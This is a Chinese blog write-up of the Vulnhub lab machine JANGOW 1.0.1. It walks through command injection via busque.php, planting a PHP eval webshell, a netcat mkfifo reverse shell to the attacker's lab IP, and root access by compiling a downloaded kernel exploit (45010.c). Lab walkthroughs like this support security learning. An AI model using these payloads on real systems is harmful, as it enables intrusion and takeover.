【Vulnhub靶场】JANGOW: 1.0.1

目录

前言

一、信息收集

0x00 环境介绍

0x01 nmap扫描

二、漏洞挖掘

0x00 命令执行漏洞利用

0x01 一句话木马利用

0x02 信息收集

三、权限提升

0x00 反弹shell

 flag



前言

Difficulty: easy

The secret to this box is enumeration!

下载链接:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent


一、信息收集

0x00 环境介绍

Jangow1.0.1靶机IP:192.168.56.118
kali攻击机IP:    192.168.56.102

 0x01 nmap扫描

查看开启端口和服务,

二、漏洞挖掘

通过访问靶机IP,寻找利用点

0x00 命令执行漏洞利用

进去site文件,发现功能点
http://192.168.56.118/site/busque.php?buscar=
尝试命令执行whoami
http://192.168.56.118/site/busque.php?buscar=whoami
发现是可以执行命令的
查看密码文件
cat/etc/passwd

0x01 一句话木马利用

可以根据命令执行漏洞写入一句话木马

写入一句话木马蚁剑连接
echo '<?php @eval ($_POST["123"]);?>' >>shell.php

 0x02 信息收集

在文件中寻找敏感信息,比如账号密码,为进一步渗透做铺垫。


 三、权限提升

0x00 反弹shell

蚁剑中只能查看部分文件,没有权限,所以可以做反弹shell进一步提权

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.128 443 >/tmp/f');?>

反弹成功

 升级shell,变成交互式
python3 -c 'import pty;pty.spawn("/bin/bash")'

uname -a
获取版本号 

 
 

根据系统版本提权
searchsploit ubuntu 4.4.0

采用45010.c这个文件进行提权

蚁剑将该文件上传到靶机

下载链接
https://gitee.com/jewels/Privilege-Escalation/repository/archive/master.zip

gcc 45010.c -o exp //生成可执行文件

chmod +x exp //添加可执行权限

./exp   //执行exp文件

 

  进入root目录,查看文件。

 

 发现proof.txt文件,进行查看。

 flag

 MD5解密发现是空密码

  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值